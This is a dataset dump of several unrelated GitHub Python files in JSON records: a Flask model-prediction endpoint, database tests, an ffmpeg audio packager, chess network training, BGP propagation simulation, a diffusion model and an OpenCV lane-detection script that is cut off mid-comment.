[reference[0], reference[1], reference[2], reference[3], num_people]\n\t\t\t\t\tcombined_course_data.append(combined_time)\n\t\t\t\t\n\t\t\t# sort the information\n\t\t\tsorted_course_data = sorted(combined_course_data, key=itemgetter(0,1,2,3))\n\n\t\t\t# write all of the information to a csv\n\t\t\tfor time in sorted_course_data:\n\t\t\t\tcsv_writer.writerow(time)\n\n\tpass\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"eronning/MenuSignificance","sub_path":"code/course/parse_course_data.py","file_name":"parse_course_data.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14478863930","text":"import pickle\nimport numpy as np\nfrom pathlib import Path\n\nfrom flask import Flask, request, jsonify\n\nimport xgboost as xgb\n\n\nMODELS_DIR = './models'\n\n\nmodel_path = Path(MODELS_DIR) / 'model.bin'\nwith open(model_path, 'rb') as f_in:\n model = pickle.load(f_in)\n\napp = Flask('concrete_strength_est')\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n sample = request.get_json()\n print(sample)\n dval = xgb.DMatrix([np.array(sample)])\n strength = model.predict(dval)\n result = {\n 'strength': float(strength[0])\n }\n return jsonify(result)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=9696)","repo_name":"ngalkov/mlzoomcamp_midterm","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1441173645","text":"from sqlalchemy import select\n\nfrom core.models.product import Product\nfrom core.models.user import User\n\n\"\"\" use case tests for create tables \"\"\"\n\n\ndef test_create_product(session):\n new_product = Product(\n description='Suco de Laranja 400ml',\n price=7.0,\n type='suco',\n )\n session.add(new_product)\n session.commit()\n\n product = session.scalar(\n select(Product).where(Product.description == 'Suco de Laranja 400ml')\n )\n\n assert product.description == 'Suco de Laranja 400ml'\n\n\ndef test_create_user(session):\n new_user = User(\n name='Maercio Mamedes',\n email='maerciomamedes@hotmail.com',\n password='secret_key',\n )\n\n session.add(new_user)\n session.commit()\n\n user = session.scalar(select(User).where(User.name == 'Maercio Mamedes'))\n assert user.name == 'Maercio Mamedes'\n","repo_name":"MaercioMamedes/Restaurant-Web-Service","sub_path":"tests/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36782907348","text":"#!/usr/bin/python\nimport os, sys, getopt, shutil, ntpath\nimport audio, resource\n\ndef CreateResourceFiles(params):\n output = params[\"output\"]\n cache = params[\"cache\"]\n name = params[\"name\"]\n\n paths = resource.CreateOutline(output, cache, name)\n resource.CopyFromCache(cache, paths)\n resource.WriteSourceFiles(name, paths)\n\n return params\n\n\ndef ProcessFileByFfmpeg(params):\n cache = params[\"cache\"]\n files = params[\"files\"]\n\n filesMax = len(files)\n filesCurrent = 1\n\n for file in files:\n #if filesCurrent > 3: break\n fileName = os.path.splitext(ntpath.basename(file))[0]\n\n audio.TryAndConvertToSuitableFormat(\n filesCurrent, filesMax,\n file, fileName, cache,\n )\n\n filesCurrent = filesCurrent + 1\n\n return params\n\ndef EnumerateInputDirectoryFiles(params):\n inputDir = params[\"input\"]\n extensions = params[\"extensions\"]\n\n soundFiles = []\n for item in os.listdir(inputDir):\n itemPath = os.path.join(inputDir, item)\n itemExt = os.path.splitext(item)[1].replace(\".\", \"\")\n\n if not itemExt in extensions:\n print(\"Ineligible file found: \" + item)\n continue\n\n if os.path.isfile(itemPath):\n soundFiles.append(itemPath)\n\n\n if len(soundFiles) == 0:\n CrashAndBurn(4, \"Given directory doesn't have any suitable files to use.\")\n\n print(\"Found \" + str(len(soundFiles)) + \" sound files\")\n params[\"files\"] = soundFiles\n return params\n\n\ndef CreateCacheFolder(params):\n cacheDir = os.path.join(os.getcwd(), \"cache\")\n\n if os.path.exists(cacheDir):\n shutil.rmtree(cacheDir)\n \n os.mkdir(cacheDir)\n\n params[\"cache\"] = cacheDir\n\n print(\"Cache directory is \" + cacheDir)\n\n return params\n\ndef NotifyIncorrectUsage(reason):\n print(\"baker.py [--in, -i] [--out, -o] [--name, -n] \")\n print(\"Fail reason: \" + reason)\n sys.exit(1)\n\ndef CrashAndBurn(code, reason):\n print(\"baker.py encountered an issue while executing.\")\n print(\"Fail reason: \" + reason)\n sys.exit(code)\n\ndef main(argv):\n params = {\n \"input\": \"\",\n \"output\": \"\",\n \"name\": \"\",\n \"cache\": \"\",\n \"files\": \"\",\n \"extensions\": audio.GetExtensionsSupported()\n }\n\n try:\n opts, _ = getopt.getopt(argv, \"i:n:o:\", [ \"in=\", \"name=\", \"out=\" ])\n except getopt.GetoptError:\n NotifyIncorrectUsage(\"error during parsing of arguments.\")\n\n argCount = 0\n\n for opt, arg in opts:\n if opt in (\"-i\", \"--in\"):\n params[\"input\"] = arg\n argCount += 1\n elif opt in (\"-n\", \"--name\"):\n params[\"name\"] = arg\n argCount += 1\n elif opt in (\"-o\", \"--out\"):\n params[\"output\"] = arg \n argCount += 1\n \n if argCount < 3:\n NotifyIncorrectUsage(\"Missing required arguments.\")\n \n if os.path.exists(params[\"input\"]) == False:\n CrashAndBurn(5, \"Input folder does not exist.\")\n\n print(\"Parameters are OK\")\n\n params = CreateCacheFolder(params)\n params = EnumerateInputDirectoryFiles(params)\n params = ProcessFileByFfmpeg(params)\n params = CreateResourceFiles(params)\n \nif __name__ == \"__main__\":\n didFindReqs = audio.CheckPrerequisites();\n\n if not didFindReqs:\n CrashAndBurn(2, \"No ffmpeg or ffprobe installation found. Please install ffmpeg suite and add it to your PATH varible.\\n\\tTo sanity check, open up a command line and enter 'ffmpeg' and 'ffprobe' to see if it are valid commands.\")\n\n main(sys.argv[1::])\n","repo_name":"manzarek123/gta-native-audio","sub_path":"_audiogen/baker.py","file_name":"baker.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11121343087","text":"import glob\nimport json\nimport os\nfrom collections import deque\nfrom concurrent.futures import ProcessPoolExecutor\nfrom random import shuffle\n\nimport numpy as np\nimport torch\nfrom tensorboard.program import TensorBoard\nfrom torch.optim import Adam\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom aki_chess_ai.ChessPolicyNetwork import ChessPolicyNetwork\nfrom aki_chess_ai.ChessValueNetwork import ChessValueNetwork\nfrom aki_chess_ai.umgebung.ChessEnv import testeval\nfrom aki_chess_ai.utils import getStateFromFEN\n\n\ndef getGameDataFilenames():\n # Get all files in ./data/play_data/*\n files = glob.glob(os.path.join(\"../data/play_data\", \"*.json\"))\n # Sort by creation time\n files.sort(key=os.path.getctime)\n return files\n\n\ndef read_game_data_from_file(path):\n try:\n with open(path, \"rt\") as f:\n return json.load(f)\n except Exception as e:\n print(e)\n\n\ndef load_data_from_file(filename):\n data = read_game_data_from_file(filename)\n return convert_to_cheating_data(data)\ndef is_black_turn(fen):\n return fen.split(\" \")[1] == 'b'\n\ndef convert_to_cheating_data(data):\n \"\"\"\n :param data: format is SelfPlayWorker.buffer -> [(state_fen, policy, value)]\n :return:\n \"\"\"\n state_list = []\n policy_list = []\n value_list = []\n for state_fen, policy, value in data:\n\n network_input = getStateFromFEN(state_fen, 1 if not is_black_turn(state_fen) else -1)\n move_number = int(state_fen.split(' ')[5])\n value_certainty = min(5, move_number)/5 # reduces the noise of the opening...\n\n # Test eval is the evaluation of the strength of the current position\n sl_value = value*value_certainty + testeval(state_fen, False)*(1-value_certainty)\n\n state_list.append(network_input)\n policy_list.append(policy)\n value_list.append(sl_value)\n\n return np.asarray(state_list, dtype=np.float32), np.asarray(policy_list, dtype=np.float32), np.asarray(value_list, dtype=np.float32)\nclass NetworkOptimizer:\n def __init__(self, lr=0.001, max_epochs=40):\n \"\"\"\n :param lr: learning rate\n \"\"\"\n self.filenames = None\n self.lr = lr\n self.max_epochs = max_epochs\n self.global_step = 0\n\n self.dataset_size = 100000\n\n self.policy_model: ChessPolicyNetwork = None\n self.value_model: ChessValueNetwork = None\n self.dataset = deque(), deque(), deque()\n\n def start(self):\n self.policy_model, self.value_model = self.load_model()\n self.train()\n\n def train(self):\n \"\"\"\n Trains the policy and value network.\n :return: schmerzen im debuggen\n \"\"\"\n\n # Config the Models for training wiht Optimizer and Loss Function\n self.config_models()\n self.filenames = deque(getGameDataFilenames())\n self.writer = SummaryWriter(log_dir=\"../logs\")\n # Randomize the order of the files\n shuffle(self.filenames)\n\n total_steps = 0\n total_epochs = 0 # count the total number of epochs\n while total_epochs < self.max_epochs: # stop when max_epochs is reached\n self.fill_queue()\n steps = self.train_epoch()\n total_steps += steps\n total_epochs += 1\n print(f\"Trained {steps} steps in epoch {total_epochs}.\")\n if(total_epochs % 10 == 0):\n self.save_current_model()\n a, b, c = self.dataset\n while len(a) > self.dataset_size:\n a.popleft()\n b.popleft()\n c.popleft()\n\n def train_epoch(self, epochs=1, batch_size=256):\n \"\"\"\n Trains the model for epochs.\n\n :epochs: number of epochs to train\n :return: number of steps\n \"\"\"\n state_array, policy_array, value_array = self.collect_all_loaded_data()\n\n num_batches = len(state_array) // batch_size\n for epoch in range(epochs):\n for batch_idx in range(num_batches):\n # Get the current batch\n start_idx = batch_idx * batch_size\n end_idx = start_idx + batch_size\n state_batch = torch.tensor(state_array[start_idx:end_idx])\n policy_batch = torch.tensor(policy_array[start_idx:end_idx])\n value_batch = torch.tensor(value_array[start_idx:end_idx])\n\n # Train the policy network\n self.policy_model.optimizer.zero_grad()\n policy_pred = self.policy_model(state_batch)\n policy_loss = self.policy_model.loss_function(policy_pred, policy_batch)\n policy_loss.backward()\n self.policy_model.optimizer.step()\n\n\n\n # Train the value network\n self.value_model.optimizer.zero_grad()\n value_pred = self.value_model(state_batch)\n value_batch = value_batch.view(-1, 1) # reshape value_batch to match value_pred\n value_loss = self.value_model.loss_function(value_pred, value_batch)\n value_loss.backward()\n self.value_model.optimizer.step()\n\n # Log the losses\n self.writer.add_scalar(\"Loss/Policy\", policy_loss.item(), global_step=self.global_step)\n self.writer.add_scalar(\"Loss/Value\", value_loss.item(), global_step=self.global_step)\n self.global_step += 1\n\n\n steps = (state_array.shape[0] //batch_size) * epochs\n return steps\n\n\n def load_model(self) -> (ChessPolicyNetwork, ChessValueNetwork):\n policy_model = ChessPolicyNetwork()\n value_model = ChessValueNetwork()\n\n policy_model, value_model = self.load_latest_checkpoint(\"../\", policy_model, value_model)\n\n return policy_model, value_model\n\n def load_latest_checkpoint(self, folder, policy_model, value_model):\n print(\"Loading latest checkpoint...\")\n policy_folder = os.path.join(folder, \"policy_training_models\")\n value_folder = os.path.join(folder, \"value_training_models\")\n\n value_checkpoints = glob.glob(os.path.join(value_folder, 'model_*.pt'))\n policy_checkpoints = glob.glob(os.path.join(policy_folder, 'model_*.pt'))\n\n # Find the latest checkpoint (highest number in the filename)\n latest_value_checkpoint = max(value_checkpoints, key=os.path.getctime)\n latest_policy_checkpoint = max(policy_checkpoints, key=os.path.getctime)\n\n value_model.load_state_dict(torch.load(latest_value_checkpoint))\n policy_model.load_state_dict(torch.load(latest_policy_checkpoint))\n\n print(\"Loaded latest value model from:\", latest_value_checkpoint)\n print(\"Loaded latest policy model from:\", latest_policy_checkpoint)\n print(\"Loading checkpoint done.\")\n\n return policy_model, value_model\n\n def save_current_model(self):\n folder = \"../\"\n # Check if folder exists, if not, create it\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n policy_folder = os.path.join(folder, \"policy_training_models\")\n value_folder = os.path.join(folder, \"value_training_models\")\n\n if not os.path.exists(policy_folder):\n os.makedirs(policy_folder)\n\n if not os.path.exists(value_folder):\n os.makedirs(value_folder)\n\n # Get the latest checkpoint number\n value_checkpoints = glob.glob(os.path.join(value_folder, 'model_*.pt'))\n policy_checkpoints = glob.glob(os.path.join(policy_folder, 'model_*.pt'))\n checkpointNumberPolicy = 0\n checkpointNumberValue = 0\n\n if len(value_checkpoints) > 0:\n value_checkpoints.sort()\n checkpointNumberPolicy = int(value_checkpoints[-1].split('_')[-1].split('.')[0]) + 1\n if len(policy_checkpoints) > 0:\n policy_checkpoints.sort()\n checkpointNumberValue = int(policy_checkpoints[-1].split('_')[-1].split('.')[0]) + 1\n\n value_filepath = os.path.join(folder, f\"value_training_models/model_{checkpointNumberValue}.pt\")\n policy_filepath = os.path.join(folder, f\"policy_training_models/model_{checkpointNumberPolicy}.pt\")\n\n torch.save(self.value_model.state_dict(), value_filepath)\n torch.save(self.policy_model.state_dict(), policy_filepath)\n\n print(\"Model saved in file:\", value_filepath)\n print(\"Model saved in file:\", policy_filepath)\n def config_models(self):\n opt_policy = Adam(params=self.policy_model.parameters(), lr=self.lr)\n opt_value = Adam(params=self.value_model.parameters(),lr=self.lr)\n\n self.policy_model.train()\n self.policy_model.optimizer = opt_policy\n self.policy_model.loss_function = torch.nn.CrossEntropyLoss()\n self.policy_model.loss_weight = 1.5\n # loss weight\n\n self.value_model.train()\n self.value_model.optimizer = opt_value\n self.value_model.loss_function = torch.nn.MSELoss()\n self.value_model.loss_weight = 1\n\n def fill_queue(self):\n \"\"\"\n Fill the queue with data from the files in the filenames queue.\n :return:\n \"\"\"\n\n futures = deque()\n # Ram hungry thing\n with ProcessPoolExecutor(max_workers=3) as executor:\n for _ in range(3):\n if len(self.filenames) == 0:\n break\n filename = self.filenames.popleft()\n print(f\"loading data from {filename}\")\n # Append Data to the queue\n futures.append(executor.submit(load_data_from_file, filename))\n\n while futures and len(self.dataset[0]) < self.dataset_size:\n for x, y in zip(self.dataset, futures.popleft().result()):\n x.extend(y)\n if len(self.filenames) > 0:\n filename = self.filenames.popleft()\n print(f\"loading data from {filename}\")\n futures.append(executor.submit(load_data_from_file, filename))\n\n def collect_all_loaded_data(self):\n \"\"\"\n\n :return: a tuple containing the data in self.dataset, split into\n (state, policy, and value).\n \"\"\"\n state_ary, policy_ary, value_ary = self.dataset\n\n state_ary1 = np.asarray(state_ary, dtype=np.float32)\n policy_ary1 = np.asarray(policy_ary, dtype=np.float32)\n value_ary1 = np.asarray(value_ary, dtype=np.float32)\n return state_ary1, policy_ary1, value_ary1\n\n\ndef main():\n optimizer = NetworkOptimizer()\n optimizer.start()\n\nif __name__ == \"__main__\":\n main()","repo_name":"DennisBaerXY/alpha-zero-style-chess","sub_path":"src/aki_chess_ai/agents/NetworkOptimizer.py","file_name":"NetworkOptimizer.py","file_ext":"py","file_size_in_byte":10553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40635619586","text":"from bgpy.caida_collector import AS\n\nfrom bgpy.simulation_engine.announcement import Announcement as Ann\nfrom bgpy.enums import Relationships\n\n\ndef propagate_to_providers(self):\n \"\"\"Propogates to providers\n\n Propogate ann's that have a recv_rel of origin or customer to providers\n \"\"\"\n\n send_rels: set[Relationships] = set([Relationships.ORIGIN, Relationships.CUSTOMERS])\n self._propagate(Relationships.PROVIDERS, send_rels)\n\n\ndef propagate_to_customers(self):\n \"\"\"Propogates to customers\"\"\"\n\n # Anns that have any of these as recv_rel get propogated\n send_rels: set[Relationships] = set(\n [\n Relationships.ORIGIN,\n Relationships.CUSTOMERS,\n Relationships.PEERS,\n Relationships.PROVIDERS,\n ]\n )\n self._propagate(Relationships.CUSTOMERS, send_rels)\n\n\ndef propagate_to_peers(self):\n \"\"\"Propogates to peers\"\"\"\n\n # Anns that have any of these as recv_rel get propogated\n send_rels: set[Relationships] = set([Relationships.ORIGIN, Relationships.CUSTOMERS])\n self._propagate(Relationships.PEERS, send_rels)\n\n\ndef _propagate(self, propagate_to: Relationships, send_rels: list[Relationships]):\n \"\"\"Propogates announcements from local rib to other ASes\n\n send_rels is the relationships that are acceptable to send\n \"\"\"\n\n for neighbor in getattr(self, propagate_to.name.lower()):\n for prefix, ann in self._local_rib.prefix_anns():\n if ann.recv_relationship in send_rels and not self._prev_sent(\n neighbor, ann\n ):\n propagate_args = [neighbor, ann, propagate_to, send_rels]\n # Policy took care of it's own propagation for this ann\n if self._policy_propagate(*propagate_args):\n continue\n else:\n self._process_outgoing_ann(*propagate_args)\n\n\ndef _policy_propagate(*args, **kwargs) -> bool:\n \"\"\"Custom policy propagation that can be overriden\"\"\"\n\n return False\n\n\ndef _prev_sent(*args, **kwargs) -> bool:\n \"\"\"Don't resend anything for BGPAS. For this class it doesn't matter\"\"\"\n return False\n\n\ndef _process_outgoing_ann(\n self,\n neighbor: AS,\n ann: Ann,\n propagate_to: Relationships,\n send_rels: list[Relationships],\n):\n \"\"\"Adds ann to the neighbors recv q\"\"\"\n\n # Add the new ann to the incoming anns for that prefix\n neighbor.receive_ann(ann)\n","repo_name":"jfuruness/bgpy_pkg","sub_path":"bgpy/simulation_engine/as_classes/bgp/bgp_simple_as/propagate_funcs.py","file_name":"propagate_funcs.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"4777069580","text":"import tools\nimport copy\n\ndef diffusionTransform(userSet, task, qualityOfSubarea, userLocation):\n taskDiffusion = 0\n for user in userSet:\n subarea = userLocation[user]\n taskDiffusion += qualityOfSubarea[task][subarea]\n return taskDiffusion\n\ndef computeIC(graph, seeds, R=500):\n influence = 0\n for i in range(R):\n queue = []\n queue.extend(seeds)\n checked = copy.deepcopy(seeds)\n while len(queue) != 0:\n current_node = queue.pop(0)\n children = graph.get_children(current_node)\n for child in children:\n if child not in checked:\n if tools.isHappened(0.4):\n checked.add(child)\n queue.append(child)\n influence += len(checked)\n influence = influence/R\n return influence\n\ndef computeMultiTaskDiffusion(graph, seeds, numberOfTask, taskWeights, qualityOfSubarea, userLocation, userBidding, R=500):\n multiTaskDiffusion = 0\n for i in range(R):\n averageRealDiffusion = 0\n for task in range(1, numberOfTask + 1):\n task_seeds = set()\n for seed in seeds:\n if userBidding[seed][task] == 1:\n task_seeds.add(seed)\n queue = []\n queue.extend(task_seeds)\n checked = copy.deepcopy(task_seeds)\n while len(queue) != 0:\n current_node = queue.pop(0)\n children = graph.get_children(current_node)\n for child in children:\n if child not in checked:\n rate = taskWeights[task]\n if tools.isHappened(rate):\n checked.add(child)\n queue.append(child)\n taskDiffusion = diffusionTransform(checked, task, qualityOfSubarea, userLocation)\n averageRealDiffusion += taskDiffusion / numberOfTask\n multiTaskDiffusion += averageRealDiffusion\n multiTaskDiffusion = multiTaskDiffusion / R\n return multiTaskDiffusion","repo_name":"guojx93/MT-DM","sub_path":"diffusionModel.py","file_name":"diffusionModel.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31674702346","text":"import matplotlib.pyplot as plt #Matplotlib 是一个 Python 的 2D绘图库\r\nimport pylab\r\nimport matplotlib.image as img\r\nimport numpy as np #NumPy是Python的一种开源的数值计算扩展\r\nimport cv2\r\nimport os\r\nimport imutils\r\nfrom imutils import contours\r\nfrom imutils import perspective\r\nfrom scipy.spatial import distance as dist\r\n\r\ndef show(name,img):\r\n cv2.imshow(name,img)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\ndef midpoint(ptA,ptB):\r\n return ((ptA[0]+ptB[0])*0.5,(ptA[1]+ptB[1])*0.5)\r\ni=0\r\na=0\r\nwhile i<10000 :\r\n\r\n img=cv2.imread('D:/Users/mediacore/lane_detection/data/training_data_example/training_data/image_gt_binary/'+str(i)+'.png')\r\n\r\n # image=img.imread('D:/Users/mediacore/lane_detection/data/tusimple_200frame/1.png')\r\n #圖片預處理\r\n # img=cv2.imread('D:/Users/mediacore/lane_detection/testing2.png')\r\n width=25\r\n # gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n\r\n # mask=np.zeros(img.shape, np.uint8)\r\n # pts=[(0,0),(256,0),(256,512),(0,0)]\r\n # points = np.array(pts, np.int32)\r\n # print('points',points)\r\n # points = points.reshape((-1, 1, 2))\r\n # print('points',points)\r\n # mask = cv2.polylines(mask, [points], True, (255, 255, 255), 2)\r\n # print('mask',mask)\r\n # mask2 = cv2.fillPoly(mask.copy(), [points], (255, 255, 255)) # 用于求 ROI\r\n # print('mask2',mask2)\r\n # mask3 = cv2.fillPoly(mask.copy(), [points], (0, 255, 0)) # 用于 显示在桌面的图像\r\n # print('mask3',mask3)\r\n\r\n # cv2.imshow(\"mask\", mask2)\r\n # cv2.waitKey(0)\r\n\r\n gray=cv2.GaussianBlur(img,(5,5),0)\r\n\r\n edged=cv2.Canny(gray,70,200)\r\n # cv2.imshow('name1',edged)\r\n # cv2.imwrite('./name1.png',edged)\r\n # cv2.waitKey(0)\r\n edged=cv2.dilate(edged,None,iterations=1)\r\n # cv2.imshow('name2',edged)\r\n # cv2.imwrite('./name2.png',edged)\r\n # cv2.waitKey(0)\r\n edged=cv2.erode(edged,None,iterations=1)\r\n # cv2.imshow('name3',edged)\r\n cv2.imwrite('./name3.png',edged)\r\n # cv2.waitKey(0)\r\n edged=cv2.dilate(edged,None,iterations=2)\r\n # edged=cv2.erode(edged,None,iterations=1)\r\n # edged=cv2.erode(edged,None,iterations=1)\r\n # print((int(img.shape[0]),int(img.shape[1]),int(img.shape[2])))\r\n # print(type((int(img.shape[0]),int(img.shape[1]),int(img.shape[2]))))\r\n w=int(img.shape[0])\r\n h=int(img.shape[1])\r\n c=int(img.shape[2])\r\n i+=1\r\n \r\n b=0\r\n\r\n# print(type(w))\r\n\r\n# size=((w,h,c),np.uint8)\r\n# black = np.zeros(size)\r\n # img=img[:,:,]\r\n\r\n # black = np.zeros((w,h,c),np.uint8)\r\n # img1=img[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])]\r\n # black[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])]=img1\r\n # img1=black\r\n\r\n # black = np.zeros((w,h,c),np.uint8)\r\n # edged=edged[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])]\r\n # edged=cv2.cvtColor(edged ,cv2.COLOR_GRAY2BGR)\r\n # black[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])]=edged\r\n # edged=black\r\n # edged=cv2.cvtColor(edged ,cv2.COLOR_BGR2GRAY)\r\n\r\n\r\n img1=img[int(img.shape[0]*0/16): int(img.shape[0]*4/16) , int(img.shape[1]*0/16) : int(img.shape[1]*16/16)]\r\n rowNum, colNum = img1.shape[:2]\r\n for x in range(rowNum):\r\n for y in range(colNum):\r\n if img1[x, y].tolist() == [255,255,255] :\r\n b+=1\r\n if b>1: \r\n a+=1\r\n show('a',img1)\r\n print(a)\r\n \r\n \r\n \r\n # show('a',img1)\r\n\r\n \r\n\r\n\r\n\r\n\r\n# # cv2.imshow('name3',img1)\r\n# # cv2.waitKey(0)\r\n# # cv2.imshow('name3',edged)\r\n# # cv2.waitKey(0)\r\n# cnts,_=cv2.findContours(edged,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n# # print('cnts',cnts)\r\n# # print('_',_)\r\n\r\n# # cv2.drawContours(img,cnts,-1,(0,0,255),3)\r\n\r\n# # (cnts,_)=contours.sort_contours(cnts)\r\n# # cv2.drawContours(img,cnts,-1,(0,0,255),3)\r\n# # pixelPerMetricX=0\r\n# # pixelPerMetricY=0\r\n\r\n# order=1\r\n# l=0\r\n# for c in cnts:\r\n \r\n# if cv2.contourArea(c) < 200: \r\n# continue\r\n# orig=img1.copy()\r\n# box=cv2.minAreaRect(c)\r\n# box=cv2.boxPoints(box)\r\n\r\n# #############找點#############\r\n# left_point_x=np.min(box[:,0])\r\n# right_point_x=np.max(box[:,0])\r\n# top_point_y=np.min(box[:,1])\r\n# bottom_point_y=np.max(box[:,1])\r\n\r\n# # left_point_y=box[:,1][np.where(box[:,0]==left_point_x)][0]\r\n# # right_point_y=box[:,1][np.where(box[:,0]==right_point_x)][0]\r\n# # top_point_x=box[:,0][np.where(box[:,1]==top_point_y)][0]\r\n# # bottom_point_x=box[:,0][np.where(box[:,1]==bottom_point_y)][0]\r\n\r\n# # vertices=np.array([[top_point_x,top_point_y],[bottom_point_x,bottom_point_y],[left_point_x,left_point_y],[right_point_x,right_point_y]])/\r\n# # cv2.imshow('orig',orig)\r\n# # cv2.waitKey(0)\r\n# #############找點#############\r\n\r\n# box=box.astype('int')\r\n# # print('box',box)\r\n\r\n# ##################切出來#####################\r\n# # box_line=np.array([box])\r\n# # mask=np.zeros(img.shape[:2],np.uint8)\r\n# # cv2.polylines(mask,box_line,1,255)\r\n# # cv2.fillPoly(mask,box_line,255)\r\n\r\n# # dst=cv2.bitwise_and(img,img,mask=mask)\r\n# # cv2.imshow('dst',dst)\r\n# # cv2.waitKey(0)\r\n\r\n# # bg=np.ones_like(img,np.uint8)*255\r\n# # cv2.bitwise_not(bg,bg,mask=mask)\r\n# # cv2.imshow('bg',bg)\r\n# # cv2.waitKey(0)\r\n\r\n# # dst_white=bg+dst\r\n# # cv2.imshow('dst_white',dst_white)\r\n# # cv2.waitKey(0)\r\n# ##################切出來#####################\r\n# print(int(np.min(box[:,0])) , int(np.max(box[:,0])) , int(np.min(box[:,1])) , int(np.max(box[:,1])))\r\n\r\n# line=img[int(np.min(box[:,1])) : int(np.max(box[:,1])) , int(np.min(box[:,0])) : int(np.max(box[:,0]))]\r\n \r\n# if l==0:\r\n# cv2.imshow('right',line)\r\n# cv2.waitKey(0)\r\n# else :\r\n# cv2.imshow('left',line)\r\n# cv2.waitKey(0)\r\n# l+=1\r\n\r\n# line = cv2.cvtColor(np.asarray(line), cv2.COLOR_RGB2BGR)\r\n# # 获得行数和列数即图片大小\r\n \r\n# rowNum, colNum = line.shape[:2]\r\n# sum=0\r\n# sum0=0\r\n# sum1=0\r\n# sum2=0\r\n# for x in range(0,rowNum,3):\r\n# for y in range(0,colNum,3):\r\n# # print(line[x,y].all())\r\n# if (line[x,y].all())>0:\r\n# sum=sum+line[x,y]\r\n# sum0=sum0+line[x,y][0]\r\n# sum1=sum1+line[x,y][1]\r\n# sum2=sum2+line[x,y][2]\r\n# # print(line[x,y])\r\n# print(line[x,y][0],line[x,y][1],line[x,y][2])\r\n# else:\r\n# sum=sum+0\r\n# print('sum',sum0,sum1,sum2)\r\n# print('shape',line.shape)\r\n\r\n# ####################################\r\n# # for x in range(0,rowNum,3):\r\n# # for y in range(0,colNum,3):\r\n# # line[x, y] = np.array([255,255,255])\r\n# # cv2.imshow('img',line)\r\n# # cv2.waitKey(0)\r\n# ####################################\r\n\r\n \r\n\r\n \r\n\r\n# # for i in range(x_min, x_max + 1):\r\n# # x_fit.append(i)\r\n# # y_fit = p1(x_fit)\r\n\r\n# box=perspective.order_points(box)\r\n# cv2.drawContours(orig,[box.astype(int)],0,(0,255,0),4) \r\n \r\n\r\n \r\n# # for x,y in box:\r\n\r\n# # cv2.circle(orig,(int(x),int(y)),5,(0,0,255),5) \r\n# # print('red',x,y)\r\n# # cv2.imshow('frame',orig)\r\n# # cv2.waitKey(0)\r\n \r\n# (tl,tr,br,bl)=box\r\n# print((tl,tr,br,bl))\r\n# print(box)\r\n# (tltrX,tltrY)=midpoint(tl,tr)\r\n# (tlblX,tlblY)=midpoint(tl,bl)\r\n# (blbrX,blbrY)=midpoint(bl,br)\r\n# (trbrX,trbrY)=midpoint(tr,br)\r\n\r\n# # left=\r\n# # right=\r\n\r\n\r\n# # cv2.circle(orig,(int(x),int(y)),5,(0,0,255),5)\r\n \r\n# # print('red',x,y)\r\n# # cv2.imshow('frame',orig)\r\n# # cv2.waitKey(0)\r\n\r\n\r\n# # print((tltrX,tltrY)\\\r\n# # ,(tlblX,tlblY)\\\r\n# # ,(blbrX,blbrY)\\\r\n# # ,(trbrX,trbrY))\r\n# # cv2.circle(orig,(int(tltrX),int(tltrY)),5,(200,0,0),-1)\r\n# # cv2.circle(orig,(int(tlblX),int(tlblY)),5,(0,200,0),-1)\r\n# # cv2.circle(orig,(int(blbrX),int(blbrY)),5,(200,0,0),-1)\r\n# # cv2.circle(orig,(int(trbrX),int(trbrY)),5,(0,200,0),-1)\r\n\r\n\r\n\r\n# # cv2.line(orig,(int(tltrX),int(tltrY)),(int(blbrX),int(blbrY)),(255,0,0),2)\r\n# # cv2.line(orig,(int(blbrX),int(blbrY)),(int(trbrX),int(trbrY)),(255,0,0),2)\r\n\r\n \r\n\r\n# dA=dist.euclidean((tltrX,tltrY),(blbrX,blbrY))\r\n\r\n# mA=(tltrY-blbrY)/(tltrX-blbrX)\r\n# # print('mA',mA)\r\n\r\n# dB=dist.euclidean((tlblX,tlblY),(trbrX,trbrY))\r\n\r\n# MB=(tlblY-trbrY)/(tlblX-trbrX)\r\n\r\n# # print('MB',MB)\r\n\r\n \r\n\r\n# pts = np.array([(tlblX,tlblY),(trbrX,trbrY),(trbrX+mA*dA/10,trbrY*mA*dA/10),(tlblX+mA*dA/10,tlblY+mA*dA/10)])\r\n\r\n# # cv2.circle(orig,(int(tlblX),int(tlblY)),5,(0,255,0),-1)\r\n# # cv2.circle(orig,(int(trbrX),int(trbrY)),5,(0,255,0),-1)\r\n# # cv2.circle(orig,(int(trbrX+mA*dA*0.5),int(trbrY*mA*dA*0.5)),5,(0,255,0),-1)\r\n# # cv2.circle(orig,(int(tlblX+mA*dA*0.5),int(tlblY+mA*dA*0.5)),5,(0,255,0),-1)\r\n\r\n\r\n# # cv2.polylines(orig,[pts],True,(0,0,255),5)\r\n\r\n\r\n# # print('長 : ',dB)\r\n# # print('寬 : 